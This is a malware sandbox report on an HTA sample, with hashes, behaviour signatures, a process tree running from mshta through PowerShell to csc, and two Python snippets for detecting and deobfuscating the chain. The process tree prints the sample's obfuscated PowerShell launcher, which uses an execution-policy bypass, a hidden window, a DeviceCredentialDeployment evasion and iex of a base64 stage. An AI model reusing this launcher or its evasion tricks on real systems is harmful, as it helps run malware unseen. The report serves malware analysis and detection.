Analysis

max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14-11-2024 02:28
Static task: static1

Behavioral task: behavioral1
  Sample: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
  Resource: win7-20240903-en

Behavioral task: behavioral2 (the run reported below; its resource matches the platform line above)
  Sample: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
  Resource: win10v2004-20241007-en
General

Target: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta
Size: 207KB
MD5: fcd22700962f05502dfd476b9fd35c11
SHA1: f338e2af10c4e6e35d7f8f6e3613516150aeea71
SHA256: 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
SHA512: 8a2ff6c978fcb10971638458887c0794d42ac8c3cd3ad5f56644dc639d4a8bfaf6bc1bb70c23006184ef285e545dbaa5b90621a6669dc58681af62a9b0a6dc19
SSDEEP: 96:43F97f45Ln2rlmc265Ln2glmccBaPrKwPjTQxZ5LnI5LnCiFlmcW65Ln2OQ:43F1f8wlz2yflzRgrsCiFlzWybQ
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes: POwersHeLl.ExE
    flow  pid   Process
    15    3968  POwersHeLl.ExE

- Evasion via Device Credential Deployment (2 IoCs)
  Processes: powershell.exe, POwersHeLl.ExE
    pid   Process
    5060  powershell.exe
    3968  POwersHeLl.ExE

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  Processes: mshta.exe
    description        ioc                                                                                                  Process
    Key value queried  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation  mshta.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
  Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
  Processes: mshta.exe, POwersHeLl.ExE, powershell.exe, csc.exe, cvtres.exe
    description  ioc                                                          Process
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  POwersHeLl.ExE
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Every process in the chain opens this key, including the compiler helpers csc.exe and cvtres.exe, so on its own this hit is weak evidence; the Geo\Nation query by mshta.exe above is the more specific geofencing indicator.

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: POwersHeLl.ExE, powershell.exe
    pid   Process
    3968  POwersHeLl.ExE
    3968  POwersHeLl.ExE
    5060  powershell.exe
    5060  powershell.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: POwersHeLl.ExE, powershell.exe
    description              pid   Process
    Token: SeDebugPrivilege  3968  POwersHeLl.ExE
    Token: SeDebugPrivilege  5060  powershell.exe

- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: mshta.exe, POwersHeLl.ExE, csc.exe
    description                       pid   Process         procid_target
    PID 3200 wrote to memory of 3968  3200  mshta.exe       85   (recorded 3 times)
    PID 3968 wrote to memory of 5060  3968  POwersHeLl.ExE  88   (recorded 3 times)
    PID 3968 wrote to memory of 1104  3968  POwersHeLl.ExE  93   (recorded 3 times)
    PID 1104 wrote to memory of 3944  1104  csc.exe         94   (recorded 3 times)
  Each write targets a process the writer itself has just created, and the pairs match the process tree below exactly: this is the memory write that accompanies process creation, not injection into an unrelated process.
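The four parent/child pairs recorded above (3200 to 3968, 3968 to 5060, 3968 to 1104, 1104 to 3944) are the whole story of this sample's execution chain. As an added example that is not part of the sandbox report, the following Python turns those pairs into constructed Sysmon-style process-creation records and walks them the way a detection rule would: it flags the mshta.exe to powershell.exe to csc.exe to cvtres.exe edges and the re-cased PowerShell image name. The EVENTS list, the SUSPICIOUS_EDGES table and the field names are assumptions made for the illustration.

```python
import ntpath

# Process creations reconstructed from the parent/child pairs recorded above.
# Constructed records in a Sysmon-like shape (pid, ppid, image), not sandbox output.
EVENTS = [
    {"pid": 3200, "ppid": 0,
     "image": r"C:\Windows\SysWOW64\mshta.exe"},
    {"pid": 3968, "ppid": 3200,
     "image": r"C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE"},
    {"pid": 5060, "ppid": 3968,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 1104, "ppid": 3968,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"},
    {"pid": 3944, "ppid": 1104,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"},
]

# Parent -> child pairs that are rarely legitimate on a user workstation (assumed table).
SUSPICIOUS_EDGES = {
    ("mshta.exe", "powershell.exe"): "HTA script host spawning PowerShell",
    ("powershell.exe", "csc.exe"): "PowerShell invoking the C# compiler (Add-Type pattern)",
    ("csc.exe", "cvtres.exe"): "resource compiler run by csc.exe (completes the Add-Type pattern)",
}

# Binaries whose on-disk spelling is all lowercase; attackers re-case them to
# dodge case-sensitive string matches on the image path.
CANONICAL_NAMES = {"mshta.exe", "powershell.exe", "csc.exe", "cvtres.exe"}


def base_name(image):
    """File name component of a Windows path, case preserved."""
    return ntpath.basename(image)


def ancestry(events, pid):
    """Walk parent links from pid to the root; returns [(pid, image)] root first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen guards against PID-reuse loops
        seen.add(pid)
        chain.append((pid, by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def suspicious_edges(events):
    """Return (parent_pid, child_pid, reason) for every flagged parent/child pair."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child["ppid"])
        if parent is None:
            continue
        key = (base_name(parent["image"]).lower(), base_name(child["image"]).lower())
        if key in SUSPICIOUS_EDGES:
            hits.append((parent["pid"], child["pid"], SUSPICIOUS_EDGES[key]))
    return hits


def case_mangled(image):
    """True when a known binary's file name is spelled with non-standard casing."""
    name = base_name(image)
    return name.lower() in CANONICAL_NAMES and name != name.lower()


def triage(events):
    """Summary for one process tree: flagged edges plus PIDs with re-cased images."""
    return {
        "edges": suspicious_edges(events),
        "mangled": [e["pid"] for e in events if case_mangled(e["image"])],
    }


if __name__ == "__main__":
    for parent_pid, child_pid, why in suspicious_edges(EVENTS):
        print(f"{parent_pid} -> {child_pid}: {why}")
    print("re-cased images:", triage(EVENTS)["mangled"])
    print("chain to cvtres.exe:", [p for p, _ in ancestry(EVENTS, 3944)])
```

Matching on the lower-cased file name is what makes the mshta to PowerShell edge fire even though the image is spelled POwersHeLl.ExE; the case check is kept as a separate, additive signal so a rule can score the re-casing on its own.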
Processes

C:\Windows\SysWOW64\mshta.exe  (PID 3200)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE  (PID 3968, child of 3200)
    Command line: "C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'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'+[chaR]0X22+'))')))"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 5060, child of 3968)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  (PID 1104, child of 3968)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  (PID 3944, child of 1104)
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B1B.tmp" "c:\Users\Admin\AppData\Local\Temp\0in0nkpt\CSCF7334F6B65CC4901955A98945D67A3C8.TMP"
        - System Location Discovery: System Language Discovery

Reading the tree: the image paths sit under SysWOW64 while the command lines name System32, so the HTA host and everything below it runs as a 32-bit process under WOW64 file-system redirection, which is also why cvtres.exe is invoked with /MACHINE:IX86. The csc.exe call with /noconfig /fullpaths and a response file in a randomly named %TEMP% subdirectory, followed by cvtres.exe, is the footprint PowerShell leaves when a script calls Add-Type to compile C# at runtime. The PowerShell command line (PID 3968) is obfuscated with [char] casts: [ChaR]58 and [CHAr]0X3a are both ':' and [ChaR]0X22 is '"', so the concatenation rebuilds [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")); the inner Iex evaluates that to a string and the outer iex runs it. The base64 argument is redacted on this page. The launcher also passes -Ex ByPass, -NoP and -w 1 (hidden window), and the same prelude is repeated by the child PowerShell (PID 5060).
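The PowerShell launcher for PID 3968 above is the piece an analyst usually has to unwind by hand. As an added example that is not part of the sandbox report, the following Python resolves the [char] casts and folds the string concatenation back into the FromBase64String call, pulls out the base64 argument, and lists the command-line tells that a rule can key on before any payload is decoded. Because the base64 argument is redacted on this page, RECORDED_CMDLINE carries a placeholder in its place; DEMO_STAGE and DEMO_CMDLINE are a constructed, benign stage used only to exercise the decode path. The regexes and the _TELLS table are assumptions made for the illustration.

```python
import base64
import re

# The PowerShell command line recorded for PID 3968 above. Its base64 argument is
# redacted on the page, so the placeholder below stands in for it; it is not a payload.
RECORDED_CMDLINE = (
    "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; "
    "iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a"
    "+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58"
    "+'FroMBASe64strINg('+[ChaR]0X22+'<REDACTED_BASE64>'+[chaR]0X22+'))')))"
)

# Constructed, benign second stage so the decode path can be exercised offline.
DEMO_STAGE = "Write-Host 'constructed stage two'"
DEMO_CMDLINE = RECORDED_CMDLINE.replace(
    "<REDACTED_BASE64>", base64.b64encode(DEMO_STAGE.encode()).decode())

_CHAR_CAST = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_JOIN = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_B64_ARG = re.compile(r'frombase64string\(\s*"([^"]*)"', re.IGNORECASE)

# Command-line traits worth a detection hit on their own, independent of the payload.
_TELLS = [
    (r"-ex\w*\s+bypass", "execution policy bypass"),
    (r"-nop\b", "profile suppressed"),
    (r"-w\s+(1|hidden)\b", "hidden window"),
    (r"devicecredentialdeployment", "DeviceCredentialDeployment evasion (window-hiding trick)"),
    (r"\biex\b", "Invoke-Expression of a built-at-runtime string"),
    (r"\[char\]", "[char] casts hiding '::' and quotes"),
    (r"frombase64string", "base64-wrapped stage"),
]


def _cast_to_literal(match):
    """Turn [char]58 / [char]0x3a into a single-quoted PowerShell literal."""
    tok = match.group(1)
    code = int(tok, 16) if tok.lower().startswith("0x") else int(tok)
    ch = chr(code)
    return "'" + ("''" if ch == "'" else ch) + "'"  # PowerShell escapes ' as ''


def deobfuscate(cmdline):
    """Resolve [char]N casts, then fold 'a'+'b' concatenations to a fixed point."""
    text = _CHAR_CAST.sub(_cast_to_literal, cmdline)
    prev = None
    while prev != text:
        prev = text
        text = _JOIN.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def extract_base64_arg(cmdline):
    """The string handed to FromBase64String, or None if that shape is absent."""
    match = _B64_ARG.search(deobfuscate(cmdline))
    return match.group(1) if match else None


def decode_stage(cmdline):
    """Decode the wrapped stage as UTF-8 (the script calls UTF8.GetString); None if invalid."""
    arg = extract_base64_arg(cmdline)
    if arg is None:
        return None
    try:
        return base64.b64decode(arg, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def tells(cmdline):
    """Labels for every evasion trait matched in the given command line."""
    return [label for pat, label in _TELLS if re.search(pat, cmdline, re.IGNORECASE)]


if __name__ == "__main__":
    print(deobfuscate(RECORDED_CMDLINE))
    print("base64 arg:", extract_base64_arg(RECORDED_CMDLINE))
    print("decoded (redacted on the page):", decode_stage(RECORDED_CMDLINE))
    print("decoded (constructed demo):", decode_stage(DEMO_CMDLINE))
    print("tells:", tells(RECORDED_CMDLINE))
```

The fold loop runs to a fixed point because one re.sub pass only merges non-overlapping pairs; three [char] casts in a row need two passes. Decoding is attempted only after the shape has been recovered, and decode_stage returns None rather than raising on the redacted placeholder so the same function is safe to run over arbitrary telemetry.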
Network
MITRE ATT&CK Enterprise v15
Downloads

1. Filesize: 2KB
   MD5: 968cb9309758126772781b83adb8a28f
   SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
   SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
   SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

2. Filesize: 13KB
   MD5: 96b2f0a83736315afed33226cb021197
   SHA1: 396373463b0f5f9627f5592eb89aafd56507aa20
   SHA256: 9b44ef0b05e17a79c69ccb3b1940ad6b66eeb40e54a8854a0a9bf854c9220108
   SHA512: 74db69ba9edc0fa69a5d6c468692fa24acaba3dd8f9099f32fa728714259f832068606d22adeb14976ab96be26215a1e9eb9551cf049f08894b4993f795444a6

3. Filesize: 3KB
   MD5: 145fe68db1e3360a7d472644b62dd45c
   SHA1: 8774f564706e16d1b71da942b31ecfb2e6fa6ed4
   SHA256: ed3254984a0b2ce127fa4fec1fadd3e40a04a320c185611d7279461019f7a951
   SHA512: e4f818499d5fd503b801b5505ad72909facc24598fb731bda7b9cd5e4bc1bb3c78bf7e751e6359bbba23dc28bbda1a1e2236195b9721e36bd31513596d1506f7

4. Filesize: 1KB
   MD5: 34f33a6ed897ead12abe8b25165f5bbf
   SHA1: d354205cc95d473e450e5f1a036642d627248612
   SHA256: 95aa5022ef00277999fb8dfa4da7b75961cfd6e6ce7451c12cf060bd02b19ed2
   SHA512: b76e6f5cb9c885f86c13529132bc1a7401879fdf38349aca66d2a4ca1aa67c72941292dfb7d6dadb45c628a297c7e09cf522fadec18fc24db6f1b0ea94482a23

5. Filesize: 60B
   MD5: d17fe0a3f47be24a6453e9ef58c94641
   SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
   SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
   SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

6. Filesize: 473B
   MD5: 4af98cbe7b888e1e92e1aa8a35732223
   SHA1: 75d54c91355c97fc9b1c3453efea5dccd817ed42
   SHA256: 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34
   SHA512: 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

7. Filesize: 369B
   MD5: a1d1dd60bb7da6fdd01bbf8e8e41fe2c
   SHA1: a2b6edfa7d9348752d2df54bf146fe3e624f27ca
   SHA256: d2c4a82f465f4902debaab261e11cba21dcdf9a91dc746847189cdb410d60ca5
   SHA512: 734860982e6bf1e06ce962ab8a87dd12ed40f52b7d49eeafbdfa57341abeb54d9af19726ea786ff089e8a528b2d8164bd02220edeba55c564dfea536e7383aae

8. Filesize: 652B
   MD5: 18a135d11fca8199ca0899ce38002751
   SHA1: 68c5991902e3012bd690dec62c50e0aa14ee1c13
   SHA256: 2b6a9838681ca7dd29134382a42b80839d9aeac11fcace801eb6812c11b60219
   SHA512: 5c024b26b02b1cc805f16cf6e5e36fefe5e2c0b0ab6087c6f50525b136eca8b886ff72e580b5c808c50c2ad07966addbc155516ce6fbc4a473acbe02c57c36e9